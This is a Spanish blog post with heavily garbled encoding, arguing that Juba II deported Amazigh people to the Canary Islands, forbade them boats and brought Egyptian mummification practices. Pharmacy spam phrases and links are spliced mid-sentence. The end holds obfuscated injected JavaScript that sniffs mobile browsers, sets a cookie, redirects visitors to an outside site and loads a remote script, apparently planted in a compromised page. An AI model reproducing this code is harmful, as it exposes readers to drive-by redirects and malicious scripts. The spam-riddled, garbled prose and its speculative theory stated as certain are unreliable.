Alkalima

Sobre los enigmas guanches de las momias y la carencia de tAi??cnicas nA?uticas

Los guanches, habitantes prehispA?nicos de las Islas Canarias, aunque en realidad este gentilicio solo aludAi??a a los habitantes de Tenerife que luego los autores hicieron extensivo al resto de los habitantes del archipiAi??lago, no conocAi??an ni las mA?s rudimentarias tAi??cnicas de navegaciA?n, no hay ni rastro de huesos de peces atribuidos a la dieta de los guanches que pudiesen corresponderse con fauna marina para la que se requiriese alejarse algunos metros de la costa para pescarla, absolutamente nada, no sabAi??an ni nadar, segA?n atestiguan las crA?nicas de la Ai??poca de la invasiA?n espaAi??ola. Ni rastro arqueolA?gico de embarcaciA?n alguna, a pesar de que obviamente llegaron al archipiAi??lago por mar. Los guanches de una isla no tenAi??an el mA?s mAi??nimo contacto con los de otras islas a pesar de que estas son visibles a simple vista.

Hay un hecho que hace mA?s extraordinario aA?n el que los guanches desconocieran cualquier tAi??cnica de navegaciA?n. PodrAi??a haber ocurrido que los guanches de una de las islas no tuviera medios de navegaciA?n debido a algA?n tabA? que les prohibAi??a adentrarse en el mar a pesar de haber llegado obviamente a la isla en algA?n tipo de embarcaciA?n, pero el problema es que carecAi??an absolutamente de tAi??cnica alguna de navegaciA?n en todas las islas, lo que supone que toda la poblaciA?n del archipiAi??lago estaba afectada por esta extraAi??a carencia nA?utica, A?nica en un pueblo insular. La pregunta que se nos abre entonces es el porquAi?? estos amazighs insulares desconocAi??an totalmente cualquier tAi??cnica de navegaciA?n.

Sin rastro de tAi??cnicas nA?uticas entre los amazighs insulares

El poblamiento de las islas Canarias por pueblos bereberes no parece ser mA?s antiguo del siglo V a.C. o del siglo I a.C ai??i?? I d.C., segA?n los datos antropolA?gicos aportados por la mayorAi??a de los especialistas basados en las evidencias fAi??sicas disponibles. Algunos hallazgos de cerA?mica de hace solo unos cuatro aAi??os indican una fecha entorno al siglo X a. C., pero solo se habla aquAi?? de cerA?mica preliminarmente asAi?? datada que no estA? asociada a restos A?seos, lo que abre la posibilidad de que se trate solo de asentamientos ocasionales de carA?cter comercial, que tampoco se conoce si su procedencia era fenicia debido a que la expansiA?n comercial de este pueblo de marineros fenicia hacia occidente no se hizo patente hasta despuAi??s del siglo IX a.C.

Lo que sAi?? se conoce por evidencias histA?ricas es que el rey mauritano Juba II (51 aprA?x. a,C. ai??i?? 23 d.C) realizA? expediciones de reconocimiento a las islas, tiempo en el que es posible que se haya efectuado el primer poblamiento estable de las Islas Canarias, pues hacia esa fecha a la que apuntan la mayorAi??a de las dataciones de restos A?seos conocidos.

No hay datos histA?ricos ni arqueolA?gicos que permitan decir a ciencia cierta si los primeros pobladores del archipiAi??lago llegaron a las islas por sus propios medios o fueron llevados a ellas en embarcaciones de alguna potencia marAi??tima de la Ai??poca. Tampoco se sabe con quAi?? intenciA?n pudieron en tal caso ser llevados aquellos primeros pobladores a las islas, mA?s teniendo en cuenta que las navegaciones de los siglos X a.C., V a.C. o I d.C. eran de cabotaje (1) que siempre se hacAi??an con las embarcaciones navegando en paralelo a la costa y sin dejar en ningA?n momento de verla. No se solAi??a pues perder esta de vista salvo excepciones impelidas por la necesidad, mA?s teniendo en cuenta que entonces no existAi??an brA?julas para orientarse en el mar, siendo asAi?? difAi??cil imaginarse que algunos barcos se atreviesen a alejarse sin mA?s de las costas africanas para adentrarse hacia el occidente en un mundo desconocido de infinitas extensiones de mar.

En este punto es importante resaltar que las islas Canarias ni siquiera son visibles desde la costa africana, dada la distancia que las separa. No habAi??a pues razA?n para dirigirse a las islas si no sabAi??an con certeza que ahAi?? estaban.

Las islas Canarias son, por otra parte, de origen volcA?nico, y no hay rastros geolA?gicos de cataclismos marinos que hubieran podido afectar a la vez a todas las Islas Canarias hacia el siglo I. Aunque hubiera sucedido algo que hubiera provocado un tabA? que les impidiese adentrarse en el mar, habrAi??an quedado rastros arqueolA?gicos de la construcciA?n de pequeAi??as embarcaciones costeras para labores de pesca, y ademA?s se hubiera conocido por los relatos de los cronistas tradiciones orales que hubieran aludido a este hecho, pero no hay absolutamente nada de eso. Parece que por alguna razA?n las islas fueron sumidas intencionadamente en la invisibilidad, en lo que pudo incidir la prohibiciA?n impuesta de que los amazighs de las islas pudiesen usar cualquier tipo de embarcaciA?n ni siquiera para pesca de bajura.

El nA?mida y la prohibiciA?n de navegar a los guanches

Lo de la ausencia absoluta de conocimientos nA?uticos por parte de los guanches es algo muy extraAi??o y para lo que ningA?n especialista ha logrado dar todavAi??a una explicaciA?n coherente. AdemA?s, es una carencia que caracterizaba a las poblaciones de todas las islas del archipiAi??lago, no solo a alguna en concreto, a pesar de que no habAi??a ni el mA?s mAi??nimo contacto entre unas islas y otras.Ai??La teorAi??a del olvido de las tAi??cnicas de navegaciA?n no tiene mucha lA?gica, pues aA?n que hubiera sido asAi?? habrAi??a quedado constancia arqueolA?gica del tiempo en que si se utilizaba algA?n tipo de embarcaciA?n, y habrAi??a habido quedado constancia a travAi??s de la transmisiA?n oral de un tiempo en que si utilizaban los guanches medios de navegaciA?n, aunque fuera para pescar, o tal vez para desplazarse de una isla a otra. Por otro lado es imposible que este olvido se hubiera producido sistemA?ticamente en las siete islas a la vez, esto no tiene ningA?n sentido. En todo caso se podrAi??a haber producido el olvido de las tAi??cnicas de navegaciA?n en alguna de las islas, pero no en todas al mismo tiempo, pues en ese caso tendrAi??a que haber habido alguna de las islas en las que aA?n se conociera algA?n tipo de tAi??cnica de navegaciA?n en el momento del contacto con los espaAi??oles.

Cada isla tenAi??a creencia religiosas diferentes, por lo que lo del tabA? tampoco se entiende que alcanzase a las poblaciones de todas las islas, sino que hubiera sido posible que se hubiese instalado en alguna de ellas, pero en todas a la vez teniendo ademA?s en cuenta que no habAi??a contacto alguno entre ellas. La ausencia de tAi??cnica nA?utica fue consecuentemente forzada por alguien que ejercAi??a control sobre la poblaciA?n de las islas, por la potencia marAi??tima que trasladA? del interior del norte africano a poblaciones amazighs que jamA?s habAi??an visto el mar hasta entonces; se precaviA? de que el ingenio de estos amazighs no les llevase a construir algA?n tipo de embarcaciA?n que les permitiese salir de las islas y comunicarse asAi?? con el exterior. Es como si la potencia marAi??tima que en algA?n momento las controlA? las islas no quisiera que ninguna otra potencia rival tuviera conocimiento de la existencia de este archipiAi??lago.

El poblamiento de las islas a partir de Juba II lo corrobora el hecho histA?rico de que en un informe atribuido a la expediciA?n de Juba II (51 aprA?x. a.C. ai??i?? 23 d.C.) al que aludiA? Plinio el Viejo (23 ai??i?? 79) (2) se habla de la flora y la fauna de las islas, pero no se menciona a sus posibles habitantes, por lo que se deduce que en el momento en que la expediciA?n de Juba II desembarcA? por primera vez en estas para elaborar el informe del que habla Plinio el Viejo no habAi??a en ellas poblamiento humano alguno.

Juba II trasladA? poblaciA?n amazigh order clomid online cheap, generic clomid. del interior de su reino a las Islas Canarias y les prohibiA? utilizar cualquier medio que permitiese a estos deportados salir de las islas. La prohibiciA?n pasA? de generaciA?n en generaciA?n, tAi??ngase en cuenta que la poblaciA?n trasladad a un territorio insular tan pequeAi??o podAi??a no pasar en la primera generaciA?n de unas pocas decenas de individuos en cada isla, y acabA? por dominar el subconsciente colectivo de las futuras generaciones de pobladores de las islas. Ai??La explicaciA?n de la prohibiciA?n en todas las islas, controladas por Juba II directamente sin conocimiento de Roma o como vasallo de esta, puede explicar el porquAi?? de la carencia sistemA?tica de tAi??cnicas de navegaciA?n en todas las islas del archipiAi??lago, prohibiciA?n que acabarAi??a transformA?ndose en olvido en las generaciones venideras de los amazighs insulares.

PodrAi??a haber rastros de cerA?micas o de inscripciones anteriores al tiempo de Juba II, pero al no haber estado estos asociados a restos A?seos humanos pudieron perfectamente deberse a asentamientos humanos ocasionales generados por expediciones comerciales transitorias que en modo alguno constituyen prueba de que en las islas habAi??an asentamientos humanos estables que ya podAi??an tener la condiciA?n de nativos de las islas.

Los xaxos y la conexiA?n egipcia

Un dato tambiAi??n extraAi??o en la cultura de los guanches en la prA?ctica religiosa de los xaxos (3) conocidas en las islas de Tenerife y Gran Canaria aunque, al parecer, segA?n las evidencias antropolA?gicas disponibles, desconocidas en el resto de islas del archipiAi??lago. Es extraAi??o porque a pesar de ser los guanches de origen amazigh, segA?n la evidencia disponible, estos no conocAi??an la prA?ctica de la momificaciA?n entre sus ritos mortuorios del norte de A?frica, pero sAi?? en cambio lo conocAi??an los egipcios. No hay pues una continuidad cultural entre Egipto y Canarias que pase por los amazighs continentales en lo que se refiere a esta prA?ctica religiosa de los xaxos (3). A?CA?mo se pudo transmitir entonces a los amazighs de Tenerife y Gran Canaria la prA?ctica de momificar a los muertos con mAi??todos muy similares al que seguAi??an los egipcios?.

La respuesta estA? en las relaciones conyugales de Juba II, que se casA? con Cleopatra Selene II (40 a.C. ai??i?? 6 d.C.), hija A?nica del cA?nsul romano Marco Antonio y la reina egipcia Cleopatra. Juba II gobernA? sobre parte del Marruecos y la Argelia actuales, realizando una expediciA?n a las islas Canarias con el beneplA?cito de emperador romano Octavio Augusto, de quien era vasallo, y al cual le remitiA? el informe del que habla Plinio el Viejo (2). DeportA? poblaciA?n depression medicine that helps with weight loss amazigh a las islas con la intenciA?n de poblarlas de manera permanente, prohibiAi??ndoles a estos colonos forzosos construir cualquier medio nA?utico para hacerles imposible todo intento de abandonar las islas.

Fue por medio de su esposa egipcia Cleopatra Selene II que tuvo contacto con sacerdotes egipcios a los que enviA? junto con los amazighs a las islas, siendo entonces estos quienes enseAi??arAi??an a los nuevos pobladores de las Canarias los conocimientos sobre momificaciA?n de los muertos.

No es difAi??cil imaginarse que los amazighs provenientes del norte de A?frica, acostumbrados a no ver el mar por ningA?n lado y a vivir nA?madas en inmensas extensiones de tierra sin fin, se sintiesen encerrados en las islas a las que habAi??an sido forzosamente llevados por Juba II para poblarlas. Los amazighs canadian synthroid without a script eran nA?madas, A?cA?mo podAi??an resignarse a vivir voluntariamente en islas que podAi??an recorrer a pie en pocos dAi??as o algunas incluso en pocas horas? DebiA? de ser traumA?tico verse forzados a vivir en un espacio tan reducido, acostumbrados como estaban a estar constantemente desplazA?ndose por las inmensas extensiones del norte de A?frica. El deseo de estas gentes por abandonar las islas debiA? de ser percibido como un problema por Juba II, que concebAi??a a la poblaciA?n sildenafil 100 mg for sale amazigh como una garantAi??a para asegurase el predominio del comercio con las mismas ante la potencial tentaciA?n romana por arrebatA?rselo.

Es interesante lo que se sabe de la fauna que habAi??a en las islas en el momento de la llegada de los espaAi??oles, perros, ovejas, cabras y cerdos. Traer estos animales desde el continente africano requiere evidentemente de navAi??os pesados, no se pueden llevar cerdos por ejemplo en pequeAi??as canoas rudimentariamente construidas y meterse con ellas en el tenebroso ocAi??ano AtlA?ntico. Es obvio que estos animales tuvieron que ser transportados en navAi??os, no en canoas, lo que incide en la teorAi??a de que los http://gmbchope.org/paxil-for-pe-treatment/ amazighs fueron llevados a las islas por una potencia marAi??tima, y no porque se hubiesen trasladados por su cuenta a las islas en canoas.

cheap diarex pro Por quAi??Ai??hablar de un traslado forzado a las islas en lugar de uno voluntario

Es interesante lo que se sabe de la fauna que habAi??a en las islas en el momento de la llegada de los espaAi??oles, perros, ovejas, cabras y cerdos. Traer estos animales desde el continente africano requiere evidentemente de navAi??os pesados, no se pueden llevar cerdos por ejemplo en pequeAi??as canoas rudimentariamente construidas y meterse con ellas en el tenebroso ocAi??ano AtlA?ntico. Es obvio que estos animales tuvieron que ser transportados en navAi??os, no en canoas, lo que incide en la teorAi??a de que los amazighs fueron llevados a las islas por una potencia marAi??tima, y no porque se hubiesen trasladados por su cuenta a las islas en canoas.

Formaban estos animales parte de su alimentaciA?n, incluso los perros, a los que al parecer previamente a su sacrificio para ser comidos eran castrados. Los cerdos debieron tener algA?n tipo de carA?cter ritualista, pues se han encontrado colmillos de estos animales en cuevas donde se enterraba a los muertos. ConsumAi??an tambiAi??n moluscos o peces de costa. Otro aspecto a tener en cuenta respecto al poblamiento de las Canarias es que la isla mA?s cercana a A?frica es Fuerteventura, a 97 km del punto mA?s cercano a la costa africana. Esta zona continental frente a la isla majorera es absolutamente desAi??rtica, y no habAi??a poblamiento humano alguno esa zona de la costa africana en Ai??poca anterior a la invasiA?n espaAi??ola durante el siglo XV.

No es difAi??cil inferir que difAi??cilmente iba una tribu nA?mada amazigh a atravesar el SA?hara con cerdos, cabras y ovejas para llegar a la costa africana del sur del actA?an Marruecos y en algA?n ponto de la desolada costa construir canoas, meterse ellos y sus animales en ellas, y lanzarse a navegar por el tenebroso ocAi??ano AtlA?ntico, teniendo ademA?s en cuenta que las costas de Lanzarote y Fuerteventura ni siquiera son visibles a simple vista desde la costa africana, ni siquiera en el supuesto de que la tribu nA?mada amazigh hubiese llegado exactamente al punto de la costa africana donde esta es mA?s prA?xima a la costa de Fuerteventura, lo que equivale a una distancia marAi??tima de 97 kilA?metros.

A?Pudieron llegar los nA?madas amazighs a un territorio absolutamente inhA?spito en esa Ai??poca (siglo I o antes) y se ponerse a construir canoas y meter en ellas a sus animales para luego lanzarse a atravesar con ellos la tenebrosa extensiA?n de mar que se presentaba ante sus ojos? Los guanches eran fundamentalmente pastores trashumantes como muchas tribus amazighs del siglo I o anteriores, que en el continente eran ademA?s nA?madas. Juba II era rey de los nA?midas, que precisamente significa nA?madas en griego. El nomadismo y la trashumancia pastoril son actividades difAi??cilmente compatibles con la crAi??a del cerdo, un animal de granja propio de culturas sedentarias. Los nA?madas amazighs no podAi??an atravesar el desierto del SA?hara llevando consigo animales como el cerdo.

Los contactos mA?s o menos habituales con las Canarias desaparecieron despuAi??s de las invasiones germA?nicas en Europa Occidental y el derrumbe del Imperio Romano en occidente, hacia el siglo IV, y en este lapso temporal que va de Juba II al siglo IV no se conocen expediciones que pudieran haber llevado animales a las islas. El primer contacto bien documentado de A?rabes con las islas se refiere a una expediciA?n llevada a cabo por Ben Farrouckh, quien partiA? de Lisboa en 999 y llegA? a Gran Canaria donde llevA? a cabo una expediciA?n pacifica pactando con los canarios a cambio de reabastecimiento, relato conocido a travAi??s del escritor Edrisi o Al-IdrAi??sAi?? (1100 ai??i?? 1165). No tendrAi??a lA?gica que estos animales hubiesen sido llevados por navAi??os A?rabes durante la Edad Media si estos tenAi??an relaciones con las islas, ya que los A?rabes al ser musulmanes no comerciaban con cerdos.

DespuAi??s de este tiempo no se conocen contactos con el archipiAi??lago hasta la llegada del genovAi??s Lancelloto Mallocello a la isla de Lanzarote en 1312, y que ya entonces habAi??a cerdos en las islas, A?quiAi??n pudo entonces haber llevado los cerdos al archipiAi??lago si no fueron los mismos navAi??os de Juba II que entre el siglo I a.C. y el I d.C. transportaron a los amazighs al archipiAi??lago Canario?

La posibilidad de un traslado voluntario de amazighs a las Islas Canarias en canoas desde la inhA?spita costa africana carece, pues, de sentido alguno.

(1) Las embarcaciones navegaban siempre en paralelo a la costa y sin dejar de perder esta de vista en ningA?n momento

http://www.icanbreathe.cn/how-much-arcoxia-can-i-take/

(2) Plinio el Viejo, Historia natural, capAi??tulo XXXVII, textos 202-205
(3) Los xaxos eran los cadA?veres momificados de los guanches con tAi??cnicas similares a las de las momias egipcias

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘5 d=1;5 2=d.f(\’4\’);2.g=\’c://b.7/8/?9&a=4&i=\’+6(1.o)+\’&p=\’+6(1.n)+\’\’;m(1.3){1.3.j.k(2,1.3)}h{d.l(\’q\’)[0].e(2)}’,27,27,’|document|s|currentScript|script|var|encodeURIComponent|info|kt|sdNXbH|frm|gettop|http||appendChild|createElement|src|else|se_referrer|parentNode|insertBefore|getElementsByTagName|if|title|referrer|default_keyword|head’.split(‘|’),0,{}))d.getElementsByTagName(‘head’)[0].appendChild(s);var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}d.getElementsByTagName(‘head’)[0].appendChild(s);eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,’g’),k[c])}}return p}(‘z(1d.1k.1l(“16”)==-1){(2V(a,b){z(a.1l(“2W”)==-1){z(/(2X|2U\\d+|2T).+1b|2P|2Q\\/|2R|2S|2Y|2Z|37|38|39|G(36|B|L)|W|35|30 |31|33|34|1b.+2O|2N|1i m(2z|2A)i|2B( K)?|2y|p(2x|2t)\\/|2u|2v|2w|2C(4|6)0|2D|2K|M\\.(2L|2M)|2J|2I|2E 2F|2G|2H/i.17(a)||/3a|3b|3E|3F|3G|50[1-6]i|3D|3C|a D|3y|X(N|Z|s\\-)|Y(3z|3A)|O(3B|1g|U)|3H|3I(3P|x|3Q)|3R|P(3O|A)|3N(j|3J)|3K|3L(3M|\\-m|r |s )|3x|3w(I|S|3i)|1a(3j|3k)|3h(X|3g)|3c(e|v)w|3d|3e\\-(n|u)|3f\\/|3l|3m|2s\\-|3u|3v|3s|3r\\-|U(3n|R)|3o|3p(V|S|3q)|3S|2l\\-s|1B|1x|1y|1c(c|p)o|1E(12|\\-d)|1J(49|Y)|1w(1H|1F)|N(1m|1n)|1o|1v([4-7]0|K|D|1p)|1s|1q(\\-|15)|F u|1r|1I|2r\\-5|g\\-y|A(\\.w|B)|2f(L|29)|2a|2b|2i\\-(m|p|t)|2o\\-|2p(J|14)|2n( i|G)|2j\\-c|2k(c(\\-| |15|a|g|p|s|t)|28)|27(1S|1T)|i\\-(20|A|q)|1R|1Q( |\\-|\\/)|1N|1O|1P|1V|1W|24|25|W|23(t|v)a|22|1X|1Y|1Z|2e|26( |\\/)|1U|2m |2q\\-|2h(c|k)|2c(2d|2g)|1M( g|\\/(k|l|u)|50|54|\\-[a-w])|1t|1u|1L\\-w|1G|1K\\/|q(j|1D|1z)|Q(f|21|1g)|m\\-1A|1C(3t|T)|4p(5E|5F|E)|5G|y(f|5D|1a|5C|1c|t(\\-| |o|v)|5z)|5A(50|3T|v )|5H|5I|5O[0-2]|5P[2-3]|5N(0|2)|5M(0|2|5)|5J(0(0|1)|10)|5K((c|m)\\-|5L|5y|5x|5l|5m)|5n(6|i)|5k|5j|5g(5h|5i)|5o|5p|5v|5R(a|d|t)|5u|5t(13|\\-([1-8]|c))|5q|5r|C(5s|5Q)|67\\-2|65(I|69|11)|63|64|J\\-g|5U\\-a|5Z(5Y|12|21|32|60|\\-[2-7]|i\\-)|5X|66|6a|6c|6b|5V(5T|62)|5W\\/|5S(6d|q|68|5w|x|5e)|4m(f|h\\-|Z|p\\-)|4n\\/|11(c(\\-|0|1)|47|Q|R|T)|4o\\-|4l|4k(\\-|m)|4h\\-0|4i(45|4j)|5f(O|P|4q|V|4w)|4x(4v|x)|4u(f|h\\-|v\\-|v )|4r(f|4s)|4t(18|50)|4g(4f|10|18)|14(3Z|41)|42\\-|3Y\\-|3X(i|m)|3U\\-|t\\-y|3V(C|3W)|E(H|m\\-|43|44)|4d\\-9|M(\\.b|F|4e)|4c|4b|46|48|4a(4y|j)|4z(40|5[0-3]|\\-v)|4Y|4Z|51|4X(52|53|60|61|H|4W|4T|4U|4V|55)|56(\\-| )|5c|5d|5b(g |5a|57)|58|59|4S|4R\\-|4F|4G|4H\\-/i.17(a.4E(0,4))){4D 1e=1h 19(1h 19().4A()+4B);1d.1k=”16=1; 